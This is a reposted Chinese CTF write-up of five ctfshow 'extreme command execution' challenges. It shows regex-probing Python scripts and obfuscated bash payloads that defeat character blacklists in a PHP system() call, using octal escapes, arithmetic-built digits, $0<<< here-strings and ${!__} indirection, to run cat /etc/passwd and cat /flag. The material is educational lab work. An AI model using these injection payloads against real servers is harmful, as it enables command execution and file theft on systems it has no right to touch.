文章详情

短信预约-IT技能 免费直播动态提醒

请输入下面的图形验证码

提交验证

短信预约提醒成功

ctfshow 每周大挑战 极限命令执行

2023-09-20 13:43

关注

《简单的命令执行题目》
这里感叹一下,g4佬是真好厉害,这次题目十分的难,嗯,对我这种菜鸡来说是这样的,想了一天,最后结束了,也还是没有想明白第五题的解法,我真是fw,比赛结束以前也只能解出4道。


但是这次获得了三十多块钱比上次解出来5题还多,一个小月卡有了,感谢ctfshow,突然感觉有点对不起,ctfshow我一分钱没花过,人家还倒贴钱,哈哈哈。

目录

基础

题目

极限命令执行1

极限命令执行2

极限命令执行3

官方的wp及分析

极限命令执行4

官方的wp及分析

极限命令执行5


在讲之前大家可以先了解了解一些基础。

首先关于<<<,这里看下面这篇文章

stackexchange的文章   因为是stackexchange的,所以是要挂vpn的
然后下面这些文章也是可以看一下的
文章

文章1 文章2 文章3

极限命令执行1

\"|`;\[\]]/",$ctfshow)){            system($ctfshow);        }else{            echo("????????");        }}?> 

这里首先跑一下正则,因为一些不知名原因,直接显示不出来,所有进行url加密以后去解密了。

\"|`;\[\]]/",chr($a))){        echo urlencode(chr($a))." ";    }}

这里我们就知道了,有这些是可以使用,这样我们就可以构造了。

因为题目提示环境是centos7,因为centos7的环境是可以直接使用/执行文件的

payload1:ctf_show=/?????a?payload2:ctf_show=/???/?a??64 /??a?

极限命令执行2

 

里面是先经过,check然后,才进去system中的,那时候没有注意,还以为check是一个php自带函数,查了半天,之后才发现了include "check.php",哈哈哈

这里是一个过滤,我们可以尝试尝试,这里写一个脚本来跑正则。

import requests#这里填写自己的靶机网址url = "http://40e404d6-3af3-401c-b11c-9e48298fd1ce.challenge.ctf.show/"str= ""for i in range(255):    data = {'ctf_show':chr(i)}    retext = requests.post(url,data=data).text    if "??????" in retext:        print(1)    else:        str += chr(i)print(str)
这里等1跑完了,可以用的就出来了。

 

这里有这些是可以使用的,然后就是这么一些东西来进行命令执行。

#这个命令大家应该都比较熟悉的吧,这个就是cat /etc/passwd的16进制$(printf "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64")#因为不能有字母和",这里就要进行变形了$'\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'

但是这里出现一个问题,就是他不能进行命令执行,但是可以执行文件。

这里就是/getflag,我里面写的就是echo 1,但是现在有出现了一个问题就是有字母x,不可以使用的,但是别忘了还是有8进制的。

 

所以将16进制转换8进制就可以了

payload:ctf_show=$'\57\147\145\164\146\154\141\147'

极限命令执行3

  

这里还是老样子,先跑跑正则。

!#$&'()01<\_{}~

这里跑出来是这些东西,看到0和1的瞬间我就想到二进制,一脸兴奋认为这题还是很简单的嘛,然后现实给我狠狠一巴掌。

这里我们可以看到其实最多就可以解析三位多了不行,之后就是在这里卡住了。

这里我卡了很久,然后是一直没有想明白然后再第一天的下午,突然想起来,一个原码和补码的知识,这里可以看ctfshow入门的57题。

这样就可以使用~()$,这四个符号来构造任何数字了,然后就有了第一代脚本。

a = r"\ 5 7 \ 1 4 7 \ 1 4 5 \ 1 6 4 \ 1 4 6 \ 1 5 4 \ 1 4 1 \ 1 4 7"b = a.split(' ')str = ""for i in b:    if i != "\\":        str += "$((~$((" + "$((~$(())))" * (int(i)+ 1) + "))))"    else:        str += "\\\\"print("$'"+str+"'")

但是这里发现并没有被执行,然后多谢 谢队的提醒,让我在进一步。

首先我们要知道shell中的单引号和双引号都有自己的意思,这点和php、java之类的挺像的,当然不包括python。

这里就不说了,随便找了一篇文章,自己可以看一下 文章

#上面脚本下面改成这样print("$\\'"+str+"\\'")

这里进了一步,但是接下来就是如何进一步执行的问题了

然后这里可以使用$0<<<来进行第一次解析来进一步执行,考虑到部分人没有vpn,这里截取一部分,上面发的文章,详细的自己进行查看,然后$0是什么意思可以自行查看上面的文章,简单点把$0当成bash就可以了。

或者可以可以这么理解,这样子还是十分好理解的。

command <<< string

command 是 Shell 命令,string 是字符串。将字符串通过标准输入,传递给命令

#然后这里再次更改脚本print的,输出的内容print("$0<<<$\\'"+str+"\\'")

这里可以看到是,执行/getflag的,输出了1。

但是放到其中的时候还是不行,因为我没有注意他是没有getflag的。

一脸兴奋到现实又给了我一巴掌。

然后就是尝试使用命令cat /flag,但是提示没有这个文件,额,没了,然后又是卡了很久。

最后才知道是要第二个解析是要转义的,哎,不是很明白,单引号要转义就算了,第二次重定向还要转义。

#最终payload# \ 1 4 3 \ 1 4 1 \ 1 6 4 \ 4 0 \ 5 7 \ 1 4 6 \ 1 5 4 \ 1 4 1 \ 1 4 7 cat /flaga = r"\ 1 4 3 \ 1 4 1 \ 1 6 4 \ 4 0 \ 5 7 \ 1 4 6 \ 1 5 4 \ 1 4 1 \ 1 4 7"b = a.split(' ')str = ""for i in b:    if i != "\\":        str += "$((~$((" + "$((~$(())))" * (int(i)+ 1) + "))))"    else:        str += "\\\\"print("$0<<<$0\\<\\<\\<$\\'"+str+"\\'")
payload:ctf_show=$0<<<$0\<\<\<$\'\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))))))\\$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\'

官方的wp及分析

这里直接把那里的话,拿过来

禁用了除了01以外的数字,这里需要理解bash对于整数的表示形式是[base#]n的形式,比方说如果一个十进制数4,可以表示为二进制数100,那么在bash里可以表示为2#100

就是说4的二进制是100,但是想让这个解析,就需要使用2#100的方法,注意需要使用$(())包起来,表示计算。

然后就是接下来怎么表示输出2。

 这里就要用到<<,<<和<不一样,他不是用于比较的,他可以用于它的格式分成开始标记(<< token)和结束标记(token)。开始标记是两个小于号 + Here 文档的名称,名称可以随意取,后面必须是一个换行符;结束标记是单独一行顶格写的 Here 文档名称,如果不是顶格,结束标记不起作用。两者之间就是多行字符串的内容。


但是这是第一种用法,下面是第二种用法,他可以将二进制的码向前一位。
1的二进制是00000001,通过<<后变成了00000010也就是2,同理也就可以得到4,8,16

 

于是呼,我们这就构造出来一个东西,\143,对就是对应的数字。

下面写一个脚本供大家使用,关于<<<和$0的意思可以看上面。

# 因为要避免出现空格,所以第一个\去掉了a = r"143\141\164\40\57\146\154\141\147" # cat /flagb = a.split("\\")str = ""for i in b:    if i != "\\":        str += "\\\\$(($((1<<1))#"+format(int(i),'b')+"))"    else:        str += "\\\\"print("$0<<<$0\<\<\<$\\'"+str+"\\'")
payload:ctf_show=$0<<<$0\<\<\<$\'\\$(($((1<<1))#10001111))\\$(($((1<<1))#10001101))\\$(($((1<<1))#10100100))\\$(($((1<<1))#101000))\\$(($((1<<1))#111001))\\$(($((1<<1))#10010010))\\$(($((1<<1))#10011010))\\$(($((1<<1))#10001101))\\$(($((1<<1))#10010011))\'

极限命令执行4

 

老样子使用python跑一下正则。

!#$&'()0<\_{}~

就比上面少一个1,但是我也没有用到1呀,所以用上面我自己第三题的payload就可以了,就不多讲了。

官方的wp及分析

因为禁用了1,所以我们就要想办法代替1。

 

这里我们可以知道${#}可以等于0,${##}=1,这时候有人就疑惑了,嗯,既然${#}可以代替0,那为什么0没有被过滤呢,我只能说很抱歉,这里\$${#},虽然输出是$0,但是并不按$0来解析,懂吧,所以我只要将上面第三题的payload的1替换成${##}就可以了

 这里推荐大家还是使用记事本直接替换,下面我是闲的没事才写的一个脚本。

# 第三题payload将取中间部分,就是$0<<<$0\<\<\<$\'后面的部分到\'a = "\\$(($((1<<1))#10001111))\\$(($((1<<1))#10001101))\\$(($((1<<1))#10100100))\\$(($((1<<1))#101000))\\$(($((1<<1))#111001))\\$(($((1<<1))#10010010))\\$(($((1<<1))#10011010))\\$(($((1<<1))#10001101))\\$(($((1<<1))#10010011))"str = ""for i in a:    if i == "\\":        i = "\\\\"        str += i    else:        if i == "1":           i = "${##}"           str += i        else:            str += iprint("$0<<<$0\<\<\<$\\'"+str+"\\'")
payload:ctf_show=$0<<<$0\<\<\<$\'\\$(($((${##}<<${##}))#${##}000${##}${##}${##}${##}))\\$(($((${##}<<${##}))#${##}000${##}${##}0${##}))\\$(($((${##}<<${##}))#${##}0${##}00${##}00))\\$(($((${##}<<${##}))#${##}0${##}000))\\$(($((${##}<<${##}))#${##}${##}${##}00${##}))\\$(($((${##}<<${##}))#${##}00${##}00${##}0))\\$(($((${##}<<${##}))#${##}00${##}${##}0${##}0))\\$(($((${##}<<${##}))#${##}000${##}${##}0${##}))\\$(($((${##}<<${##}))#${##}00${##}00${##}${##}))\'

极限命令执行5

 

这里还是使用脚本先跑一下正则。

!$&'()<=\_{}~

只有这些东西,那时候实在给我恶心的不行,我太执着于$_,认为将$_再次执行一次才是正解,哎,最终还是以失败告终。

接下来给大家分析的是官方的wp和我自己的一些见解,毕竟我这个没有搞出来,血亏一个月卡。

因为~()$,这四个都是还在的,我们肯定还是可以构造任意数字的,主要就是bash的问题,我们没有bash就是解析不了,所以我那时候的思路也就是使用东西来替换$0.

 

这里我们可以看到,其实这些都是输出的bash的,然后看看$0.

 

也是bash,其实我们可以使用${0}来代替$0,$0其实是一种自带的简化的写法,0-9都可以使用简化,但是9上面就是要加上{}了,所以我们就是将$0还原。

 

 

 其实通过上面的知识,大家都应该知道了$(())是等于0的,然后那里所有可以使用字符中是只有_可以当做参数,然后要注意这里要和php分开,他这里一个_是不可以当做参数的,$_有自己的意思,就是记录上一次的值,所以可以使用多个_来作为参数。

 

所以__就等于了0,这里可以使用&&联合执行很重要。

这里要了解一下!这个符号,这个是可以获得前面的命令,!加字符串,可以获得上面包含这个字符的命令。

详细了解一下

 

结合上面的内容我们就获得了bash,然后把3那个我自己payload拿过来改一下。

这里看到是执行cat /flag,我自己根目录下面有一个flag。

#最终payload# \ 1 4 3 \ 1 4 1 \ 1 6 4 \ 4 0 \ 5 7 \ 1 4 6 \ 1 5 4 \ 1 4 1 \ 1 4 7 cat /flaga = r"\ 1 4 3 \ 1 4 1 \ 1 6 4 \ 4 0 \ 5 7 \ 1 4 6 \ 1 5 4 \ 1 4 1 \ 1 4 7"b = a.split(' ')str = ""for i in b:    if i != "\\":        str += "$((~$((" + "$((~$(())))" * (int(i)+ 1) + "))))"    else:        str += "\\\\"print("__=$(())%26%26${!__}<<<${!__}\\<\\<\\<$\\'"+str+"\\'")

我是比较喜欢这样的方法,好调试,可以放到自己靶机里面尝试改正,注意&&是要进行url编码的哦。

payload:ctf_show=__=$(())%26%26${!__}<<<${!__}\<\<\<$\'\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))))))\\$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\'

来源地址:https://blog.csdn.net/m0_64815693/article/details/128986188

阅读原文内容投诉

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

软考中级精品资料免费领

  • 历年真题答案解析
  • 备考技巧名师总结
  • 高频考点精准押题
  • 2024年上半年信息系统项目管理师第二批次真题及答案解析(完整版)

    难度     813人已做
    查看
  • 【考后总结】2024年5月26日信息系统项目管理师第2批次考情分析

    难度     354人已做
    查看
  • 【考后总结】2024年5月25日信息系统项目管理师第1批次考情分析

    难度     318人已做
    查看
  • 2024年上半年软考高项第一、二批次真题考点汇总(完整版)

    难度     435人已做
    查看
  • 2024年上半年系统架构设计师考试综合知识真题

    难度     224人已做
    查看

相关文章

发现更多好内容

猜你喜欢

AI推送时光机
位置:首页-资讯-后端开发
咦!没有更多了?去看看其它编程学习网 内容吧
首页课程
资料下载
问答资讯